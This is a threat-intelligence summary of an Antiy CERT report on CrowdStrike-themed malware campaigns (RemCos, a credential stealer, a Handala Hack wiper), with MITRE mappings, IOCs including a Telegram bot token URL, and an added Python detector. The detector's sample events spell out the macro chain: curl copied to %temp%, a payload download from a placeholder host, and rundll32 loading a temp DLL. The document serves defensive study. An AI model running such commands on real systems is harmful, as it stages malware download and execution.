Antiy CERT linked CrowdStrike’s blue-screen incident to the spread of RemCos, a secret-stealing Trojan, and a wiper data eraser. The report details decoy blue-screen recovery documents, LNK/DOCM macro delivery, and phishing campaigns (including a Handala Hack operation) with C2 communication and related indicators. #RemCos #AutoIt #HandalaHack #CrowdStrike #Wiper
Key points
- The incident involved multiple pieces of malicious code that capitalized on CrowdStrike’s BSOD event, including the RemCos remote-control tool, a secret-stealing Trojan, and a wiper.
- Attack Activity 1 used a shortcut file and a malicious macro in a Word document; the macro downloaded and Base64-decoded a payload, dropping a secret-stealing DLL (mscorsvc.dll).
- The initial decoy documents mimic CrowdStrike recovery guidance and use macro code to download the final payload and execute it via rundll32.
- Attack Activity 2 from Handala Hack used phishing emails with attachments and malicious links leading to a wiper (CrowdStrike.exe) delivered via update.zip.
- The malicious documents and payloads include explicit file names, MD5s, sizes, and indicators such as a Base64-encoded payload and AutoIt components.
- Indicators of Compromise include specific file names (e.g., y_Tool_to_help_with_CrowdStrike_issue_impacting_Windows.lnk, New_Recovery_Tool_to_help_with_CrowdStrike_issue_impacting_Windows.docm), MD5 hashes, a C2 IP, and a Telegram bot URL used for C2 relays.
- Defensive notes: Antiy’s AVL SDK and related security products can detect and remove these threats; the report emphasizes awareness and defense against such opportunistic attacks.
MITRE Techniques
- [T1566.001] Phishing: Spearphishing Attachment – The campaign uses phishing emails with attachments to deliver malware. Quote: “The phishing email contains two attachments, namely CSfooter.png and update1.pdf.”
- [T1566.002] Phishing: Spearphishing Link – A malicious link in a PDF leads to a download of a payload. Quote: “The PDF file contains a hyperlink named ‘Download The Updater’. When the user clicks the hyperlink, a compressed file named ‘update.zip’ will be downloaded, which contains a malicious program named ‘CrowdStrike.exe’.”
- [T1023] Shortcut Modification – Initial payloads use LNK files pointing to a macro-enabled document. Quote: “The target location of the shortcut file pointed to a document named ‘New_Recovery_Tool_to_help_with_CrowdStrike_issue_impacting_Windows.docm’.”
- [T1204.002] User Execution: Malicious File – Opening the decoy document with malicious macro triggers payload deployment. Quote: “After opening the document with malicious macro code, the content in the document is ‘Microsoft official document on how to fix blue screen events’.”
- [T1059.003] Command and Scripting Interpreter: Windows Command Shell – The macro runs the curl tool from the command line to fetch the payload. Quote: “copies the curl tool in the system to the %temp% directory, uses the tool to download the ‘payload2.txt’ file from the specified URL, decodes it with Base64, and saves it as the %temp%\mscorsvc.dll file.”
- [T1055] Process Injection – The final payload is injected into memory for execution. Quote: “injects the final payload into the memory for execution.”
- [T1555.003] Credentials from Web Browsers – The secret-stealing Trojan extracts browser data and exfiltrates it. Quote: “The secret-stealing Trojan steals sensitive data from browsers such as Chrome, Edge, and Firefox, stores the stolen data in the C:\Windows\Temp path, and eventually transmits the stolen data back to the C2 server.”
- [T1041] Exfiltration Over C2 Channel – Stolen data is transmitted to the C2 server. Quote: “transmits the stolen data back to the C2 server.”
- [T1485] Data Destruction – The Handala Hack operation includes a wiper that erases data. Quote: “a data eraser named ‘wiper’.”
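The macro chain quoted under T1059.003 (Word spawning a copy of curl from %temp%, then rundll32 loading a DLL dropped in %temp%) is a good fit for process-creation telemetry. The detection sketch below is an added example, not code from the Antiy report; its Sysmon-style events, pids, user paths, the download URL and the DLL export ordinal are constructed placeholders, not indicators from the report.

```python
"""Added detection sketch (not from the Antiy report): flag the macro chain
Office -> curl copied to %temp% -> rundll32 loading a DLL from %temp%."""
import re

# Constructed Sysmon-style process-creation events; paths, pids, the URL
# and the export ordinal are placeholders, not indicators from the report.
WINWORD = r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE"
TEMP = r"C:\Users\alice\AppData\Local\Temp"
SAMPLE_EVENTS = [
    {"pid": 4120, "ppid": 1001, "image": WINWORD, "parent_image": r"C:\Windows\explorer.exe",
     "cmdline": "WINWORD.EXE New_Recovery_Tool_to_help_with_CrowdStrike_issue_impacting_Windows.docm"},
    {"pid": 4388, "ppid": 4120, "image": r"C:\Windows\System32\cmd.exe", "parent_image": WINWORD,
     "cmdline": rf"cmd.exe /c copy C:\Windows\System32\curl.exe {TEMP}\curl.exe"},
    {"pid": 4402, "ppid": 4120, "image": rf"{TEMP}\curl.exe", "parent_image": WINWORD,
     "cmdline": rf"curl.exe -o {TEMP}\payload2.txt http://placeholder.invalid/payload2.txt"},
    {"pid": 4410, "ppid": 4120, "image": r"C:\Windows\System32\rundll32.exe", "parent_image": WINWORD,
     "cmdline": rf"rundll32.exe {TEMP}\mscorsvc.dll,#1"},
    {"pid": 5000, "ppid": 2222, "image": r"C:\Windows\System32\rundll32.exe",
     "parent_image": r"C:\Windows\System32\svchost.exe",
     "cmdline": r"rundll32.exe C:\Windows\System32\shell32.dll,Control_RunDLL"},  # benign
]

OFFICE = re.compile(r"\\(WINWORD|EXCEL|POWERPNT)\.EXE$", re.I)
LOLBINS = {"cmd.exe", "curl.exe", "rundll32.exe", "powershell.exe"}

def classify(ev):
    """Return the rule names a single event triggers (empty list if none)."""
    name = ev["image"].rsplit("\\", 1)[-1].lower()
    cmd = ev["cmdline"]
    hits = []
    if OFFICE.search(ev["parent_image"]) and name in LOLBINS:
        hits.append("office-spawned-lolbin")
    if re.search(r"\bcopy\b.*curl\.exe.*\\Temp\\", cmd, re.I):
        hits.append("curl-copied-to-temp")
    if name == "curl.exe" and re.search(r"\\Temp\\curl\.exe$", ev["image"], re.I):
        hits.append("curl-running-from-temp")
    if name == "rundll32.exe" and re.search(r"\\Temp\\[^\s,]+\.dll", cmd, re.I):
        hits.append("rundll32-dll-from-temp")
    return hits

def correlate(events):
    """Group hits by parent pid: 'high' only when the whole download-then-
    rundll32 chain is seen under one parent, 'medium' for isolated hits."""
    by_parent = {}
    for ev in events:
        for h in classify(ev):
            by_parent.setdefault(ev["ppid"], set()).add(h)
    verdicts = {}
    for ppid, rules in by_parent.items():
        fetched = bool(rules & {"curl-copied-to-temp", "curl-running-from-temp"})
        verdicts[ppid] = "high" if fetched and "rundll32-dll-from-temp" in rules else "medium"
    return verdicts
```

The benign rundll32 launch of shell32.dll under svchost produces no hit, so the verdict is raised only for the Word process that both staged curl and loaded a DLL from %temp%.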
Indicators of Compromise
- [File name] IO: y_Tool_to_help_with_CrowdStrike_issue_impacting_Windows.lnk, New_Recovery_Tool_to_help_with_CrowdStrike_issue_impacting_Windows.docm, CrowdStrike.exe
- [MD5] IO: EB29329DE4937B34F218665DA57BCEF4, DD2100DFA067CAAE416B885637ADC4EF, and 2 more hashes
- [IP address or URL] IO: 172.104.160.126, hxxps://api.telegram[.]org/bot7277950797:AAF99Nw5rAT1BHnMmwY_tQNYJFU3dYJ5RHc/sendMessage?chat_id=7436061126
Read more: https://www.antiy.cn/research/notice&report/research_report/Disguise_CrowdStrike_Trojan.html